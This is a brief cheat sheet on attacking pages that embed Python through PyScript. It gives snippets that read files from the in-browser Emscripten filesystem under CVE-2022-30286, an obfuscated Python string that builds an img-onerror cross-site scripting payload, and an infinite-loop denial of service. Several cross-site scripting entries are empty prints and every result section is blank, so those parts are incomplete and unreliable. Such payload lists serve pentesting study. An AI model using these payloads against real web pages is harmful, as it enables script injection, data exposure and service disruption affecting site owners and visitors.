# PyScript Pentesting Guide
PyScript is a new framework developed for integrating Python in the HTML so, it can be used alongside HTML. In this cheat sheet you'll find how to use the PyScript for your penetration testing purposes.
## Dumping / Retrieving files from the Emscripten virtual memory filesystem:
`CVE ID: CVE-2022-30286`
Code:
```
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
```
Result:
## [OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)](https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript)
`CVE ID: CVE-2022-30286`
Code:
```
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('')
```
Result:
## Cross Site Scripting (Ordinary)
Code:
```
print("
")
```
Result:
## Cross Site Scripting (Python Obfuscated)
Code:
```
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
```
Result:
## Cross Site Scripting (JavaScript Obfuscation)
Code:
```
print("")
```
Result:
## DoS attack (Infinity loop)
Code:
```
while True:
print(" ")
```
Result:
